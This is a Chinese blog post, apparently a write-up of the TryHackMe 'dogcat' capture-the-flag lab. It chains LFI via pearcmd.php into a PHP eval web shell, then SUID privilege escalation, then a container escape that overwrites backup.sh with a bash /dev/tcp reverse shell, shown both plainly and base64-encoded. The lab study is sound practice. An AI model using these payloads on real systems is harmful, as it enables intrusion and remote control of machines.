<!DOCTYPE html>
<html lang="zh-CN">
    
    <head>
    <meta charset="utf-8">
    <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0,  viewport-fit=cover" name="viewport" />
    <meta name="description" content="dogcat" />
    <meta name="hexo-theme-A4" content="v1.8.2" />
    <link rel="alternate icon" type="image/webp" href="/img/favicon.webp">
    <title>v2ish1yan</title>

    
        
<link rel="stylesheet" href="/css/a11y-dark.min.css">

        
<link rel="stylesheet" href="/css/reset.css">

        
<link rel="stylesheet" href="/css/markdown.css">

        
<link rel="stylesheet" href="/css/fonts.css">
 
         <!--注意：首页既不是post也不是page-->
        
            
<link rel="stylesheet" href="/css/waline.css">

        
        
        
<link rel="stylesheet" href="/css/ui.css">
 
        
<link rel="stylesheet" href="/css/style.css">


        
            <!--返回顶部css-->
            
<link rel="stylesheet" href="/css/returnToTop.css">

            
<link rel="stylesheet" href="/css/unicons.css">

        
        
            <!--目录-->
            
<link rel="stylesheet" href="/css/toc.css">

        
    
    

<meta name="generator" content="Hexo 6.3.0"></head>
    
    <style>
        :root {
            --waline-theme-color: #000000; 
            --waline-color: #000000; 
            --waline-border-color: #000000; 
            --waline-white: #000000; 
            --waline-bgcolor-light: #ffffff;  
        }
        body {
            color: #000000;
            background: #e4e4e4;
        }
        .post-md code {
            background: #212425;
            color: white; 
        }
        .year-font-color {
            color: #000000 !important;
        }
        .wl-card span.wl-nick {
            color: #000000; 
        }
        .wl-card .wl-badge {
            border: 1px solid #000000;
            color: #000000; 
        }
        .wl-btn {
            border: 1px solid #000000; 
            color:  #000000;  
        }
        .wl-btn.primary {
            color: #ffffff; 
        }
        .wl-header label {
            color: #000000;
        }
        a {
            color: rgb(239, 112, 96);
        }

        .post-md a {
            color: rgb(239, 112, 96);
        }

        .nav li a {
            color: rgb(239, 112, 96);
        }

        .archive-main a:link {
            color: rgb(239, 112, 96);
        }
        .archive-main a:visited {
            color: rgb(239, 112, 96); 
        }

        .archive li span {
            color: #000000;
        }

        .post-main-title {
            color: #000000;
        }

        .post-md h1,
        .post-md h2,
        .post-md h3,
        .post-md h4,
        .post-md h5,
        .post-md h6 {
            color: #000000;
        }

        [data-waline] p {
            color: #000000;
        }
        [data-waline] a {
            color: #000000;
        } 
        .wl-sort li.active {
            color: #000000;
        }

        .wl-card .wl-meta>span {
            background: #ffffff;
        }

        .paper {
            background: #e4e4e4;
        }

        .index-main {
            background: #ffffff;
        }

        .paper-main {
            background: #ffffff;
        }

        .wl-panel {
            background: #ffffff;
        }

        .archive li:nth-child(odd) {
            background: #ffffff;
            ;
        }

        .archive li:nth-child(even) {
            background: #ffffff;
        }

        .post-md>table tr:nth-child(odd) td {
            background: #ffffff;
        }

        .post-md>table tr:nth-child(even) td {
            background: #ffffff;
        }

    
        .progress-wrap::after {
            color: #000000; /* 箭头的颜色 */
        }
        .progress-wrap svg.progress-circle path {
	        stroke: #000000; /* 边框的颜色 */
        }
        .progress-wrap::before {
	        background-image: linear-gradient(298deg, rgb(239, 112, 96), rgb(239, 112, 96)); /* 鼠标滑过的箭头颜色 */
         }

         .left-toc-container::-webkit-scrollbar-thumb {
            background-color: #000000; /* 设置滚动条拖动块的颜色 */
        }

        .bs-docs-sidebar .nav>.active>a,
        .bs-docs-sidebar .nav>li>a:hover,
        .bs-docs-sidebar .nav>li>a:focus {
            color: rgb(239, 112, 96);
            border-left-color: rgb(239, 112, 96);
        }
        .bs-docs-sidebar .nav>li>a {
            color:  #000000;
        }
    </style>

    
    <body>
        
            <div class="left-toc-container">
                <nav id="toc" class="bs-docs-sidebar"></nav>
            </div>
        
        <div class="paper">
            
            
            
            
                <div class="shadow-drop-2-bottom paper-main">
                    
<div class="header">
    <div class="header-container">
        <img style="
        width: 56px;
        height: auto;" alt="^-^" cache-control="max-age=86400" class="header-img" src="/img/favicon.webp" width="10%"></img>
        <div class="header-content">
            <a class="logo" href="/">v2ish1yan</a> 
            <span class="description">一切都是兴趣使然</span> 
        </div>
        
    </div>
    
   
    <ul class="nav">
        
            
                <li><a href="/">首页</a></li>
            
        
            
                <li><a href="/list/">文章</a></li>
            
        
            
                <li><a href="/tags/">标签</a></li>
            
        
            
                <li><a href="/categories/">分类</a></li>
            
        
            
                <li><a href="/about/">关于</a></li>
            
        
            
                <li><a href="/friends/">友链</a></li>
            
        
    </ul>
</div> 
        
                    
                    

                    
                    
                    
                    <!--说明是文章post页面-->
                    
                        <div class="post-main">

    
        <div class="post-main-title">
            dogcat
        </div>
      
    

    <div class="post-md">
        
            
                <ol class="post-toc"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#pearcmd-php"><span class="post-toc-text">pearcmd.php</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#flag1"><span class="post-toc-text">flag1</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#flag2%E3%80%813"><span class="post-toc-text">flag2、3</span></a></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#flag4"><span class="post-toc-text">flag4</span></a></li></ol>
            
        
        <h2 id="pearcmd-php"><a href="#pearcmd-php" class="headerlink" title="pearcmd.php"></a>pearcmd.php</h2><p>访问web</p>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202307172202522.png" alt="image-20230717220249435"></p>
<p>有个view参数，测试发现，view参数里必须带有dog或者cat字符串，然后会在view参数值后面添加<code>.php</code></p>
<p>是使用include进行的文件包含</p>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202307172204262.png" alt="image-20230717220428222"></p>
<p>这里可以发现<code>include_path=&#39;.:/usr/local/lib/php&#39;</code></p>
<p>就是说，include函数包含的文件只能是当前文件夹和<code>/usr/local/lib/php</code>文件中的文件</p>
<p>可以尝试使用pearcmd.php来生成shell</p>
<p><a target="_blank" rel="noopener" href="https://y4tacker.github.io/2022/06/19/year/2022/6/%E5%85%B3%E4%BA%8Epearcmd%E5%88%A9%E7%94%A8%E6%80%BB%E7%BB%93/">Y4爷文章</a></p>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202307172206194.png" alt="image-20230717220610166"></p>
<p>从题目描述来看，这个web环境是在docker里的</p>
<blockquote>
<p>I made a website where you can look at pictures of dogs and&#x2F;or cats! Exploit a PHP application via LFI and break out of a docker container.</p>
</blockquote>
<p>所以可以进行利用</p>
<p>payload</p>
<pre><code class="bash">/?view=/usr/local/lib/php/dog/../pearcmd&amp;+config-create+/&lt;?=@eval($_POST[&#39;cmd&#39;]);die()?&gt;+/var/www/html/shell.php 
</code></pre>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202307172210365.png" alt="image-20230717221050296"></p>
<p>但是他会把<code>&lt;</code>进行url编码，导致不会被解析为php文件</p>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202307172217567.png" alt="image-20230717221715536"></p>
<p>这里需要使用burp发包，直接使用浏览器的话，他会自动进行url编码</p>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202307182032417.png" alt="image-20230718203230361"></p>
<p>然后访问shell.php获得shell</p>
<h2 id="flag1"><a href="#flag1" class="headerlink" title="flag1"></a>flag1</h2><p>得到flag1</p>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202307182032770.png" alt="image-20230718203209712"></p>
<h2 id="flag2、3"><a href="#flag2、3" class="headerlink" title="flag2、3"></a>flag2、3</h2><p>使用蚁剑连接，查找有suid位的文件进行提权</p>
<p><code>find / -user root -perm -4000 -print 2&gt;/dev/null</code></p>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202307182045532.png" alt="image-20230718204526510"></p>
<p>先弹个shell，之前忘了，这里是无法提权的，因为没有进行交互</p>
<p>直接上传<a target="_blank" rel="noopener" href="https://github.com/pentestmonkey/php-reverse-shell">php-reverse-shell</a>，然后访问</p>
<p>得到shell</p>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202307182055170.png" alt="image-20230718205547135"></p>
<p>使用<code>env /bin/bash -p</code>进行提权</p>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202307182056319.png" alt="image-20230718205628293"></p>
<p>得到flag3</p>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202307182056375.png" alt="image-20230718205656353"></p>
<p>flag2</p>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202307182057959.png" alt="image-20230718205753929"></p>
<h2 id="flag4"><a href="#flag4" class="headerlink" title="flag4"></a>flag4</h2><p>使用命令<code>cat /proc/1/cgroup | grep -qi docker &amp;&amp; echo &quot;Is Docker&quot; || echo &quot;Not Docker&quot;</code>可以发现，当前环境为docker</p>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202307182059359.png" alt="image-20230718205928335"></p>
<p>那么就是要docker逃逸了</p>
<p>使用容器逃逸检测脚本<a target="_blank" rel="noopener" href="https://github.com/teamssix/container-escape-check">container-escape-check</a></p>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202307182105254.png" alt="image-20230718210528218"></p>
<p>存在两个逃逸漏洞</p>
<p>查看这篇文章<a target="_blank" rel="noopener" href="https://wiki.teamssix.com/CloudNative/Docker/CVE-2021-22555.html">https://wiki.teamssix.com/CloudNative/Docker/CVE-2021-22555.html</a></p>
<p>发现打不成功</p>
<p>看了别人的wp，是去找<code>/opt/backup</code>目录</p>
<p>可以发现里面有个<code>backup.sh</code>，可能会定期执行</p>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202307182121806.png" alt="image-20230718212129781"></p>
<p>所以重写一下这个文件</p>
<pre><code class="bash">#!/bin/bash
/bin/bash -i &gt;&amp; /dev/tcp/10.11.35.4/9998 0&gt;&amp;1
</code></pre>
<p>要在root权限下重写</p>
<pre><code class="bash">echo IyEvYmluL2Jhc2gKL2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjExLjM1LjQvOTk5OCAwPiYx | base64 -d &gt; /opt/backups/backup.sh
</code></pre>
<p>等待，然后获得shell</p>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202307182126592.png" alt="image-20230718212633562"></p>
<p>得到flag4</p>
<p><img src="https://typero-1312563978.cos.ap-shanghai.myqcloud.com/typero/202307182126531.png" alt="image-20230718212657499"></p>
<p>emmm，怎么跟我想象的docker逃逸不一样</p>

    </div>

    <div class="post-meta">
        <i>
        
            <span>2023-07-18</span>
            
                <span>该篇文章被 v2ish1yan</span>
            
            
                <span>打上标签:
                    
                    
                        <a href='/tags/Linux/'>
                            Linux
                        </a>
                    
                </span>
             
             
                <span>归为分类:
                    
                    
                        <a href='/categories/Tryhackme/'>
                            Tryhackme
                        </a>
                    
                </span>
            
        
        </i>
    </div>
    
        
    <div class="comments-container">
    <div id="comment-anchor"></div>
    <div class="comment-area-title">
         
    </div>
    
        

    <div id="waline"></div>
    <script type="module"  >
        import { init } from 'https://npm.elemecdn.com/hexo-theme-a4@latest/source/js/waline.mjs'; 
        function loadWaline() {
            init({
                el: '#waline',
                serverURL: 'https://a4-talk.vercel.app',
                lang: 'zh-CN',
                dark: 'body[class~="dark-mode"]',
                requiredMeta: ['nick','mail'], // cannot customize by theme config, change it yourself
                search: false, // 禁止表情包搜索
                reaction: false, // 对文章打分
                pageview: false, // 浏览量统计
                comment: false, // 评论数统计

                locale: {
                    placeholder: '欢迎评论', 
                    sofa: ''
                },
            });
            
        }
        window.addEventListener('DOMContentLoaded', loadWaline);
    </script>



    
    
    
    </div>


     
</div>



                                      
                    
                    
                    <div class="footer">
    
        <span> 
            © 1949-2024 China 

            
                

            
        </span>
    
</div>
<!--这是指一条线往下的内容-->
<div class="footer-last">
    
            <span>🌊面朝大海，春暖花开🌸</span>
            
                <span class="footer-last-span-right"><i>本站由<a target="_blank" rel="noopener" href="https://hexo.io/zh-cn/index.html">Hexo</a>驱动｜使用<a target="_blank" rel="noopener" href="https://github.com/HiNinoJay/hexo-theme-A4">Hexo-theme-A4</a>主题</i></span>
            
    
</div>


   
    
<script src="/js/highlight.min.js"></script>

    
<script src="/js/highlightjs-line-numbers.js"></script>


    
<script src="/js/randomHeaderContent.js"></script>

    <!--回到顶部按钮-->
    
        
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.0/jquery.min.js"></script>

        
<script src="/js/returnToTop.js"></script>

    

    <!--目录-->
    
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/1.7.2/jquery.min.js" type="text/javascript" ></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jqueryui/1.12.1/jquery-ui.min.js" type="text/javascript" ></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.tocify/1.9.0/javascripts/jquery.tocify.min.js" type="text/javascript" ></script>
        
<script src="/js/toc.js"></script>

    



<script>
    hljs.initHighlightingOnLoad();
    hljs.initLineNumbersOnLoad();
</script>



                </div>
            
            
                <!-- 回到顶部的按钮-->  
                <div class="progress-wrap shadow-drop-2-bottom">
                    <svg class="progress-circle svg-content" width="100%" height="100%" viewBox="-1 -1 102 102">
                        <path d="M50,1 a49,49 0 0,1 0,98 a49,49 0 0,1 0,-98"/>
                    </svg>
                </div>
            
    </body>


    <!--暗黑模式-->
    <script src="/js/darkmode-js.min.js"></script>
    <script>
        function addDarkmodeWidget() {
        const options = {
            bottom: '53px', // default: '32px'
            right: 'unset', // default: '32px'
            left: '42px', // default: 'unset'
            time: '0.3s', // default: '0.3s'
            mixColor: '#fff', // default: '#fff'
            backgroundColor: ' #e4e4e4  ',  // default: '#fff'
            buttonColorDark: '#100f2c',  // default: '#100f2c'
            buttonColorLight: '#fff', // default: '#fff'
            saveInCookies: true, // default: true,
            label: '🌓', // default: ''
            autoMatchOsTheme: true // default: true
        }
    
        const darkmode = new Darkmode(options);
        darkmode.showWidget();
        
        }
        window.addEventListener('load', addDarkmodeWidget);
    </script>
  
</html>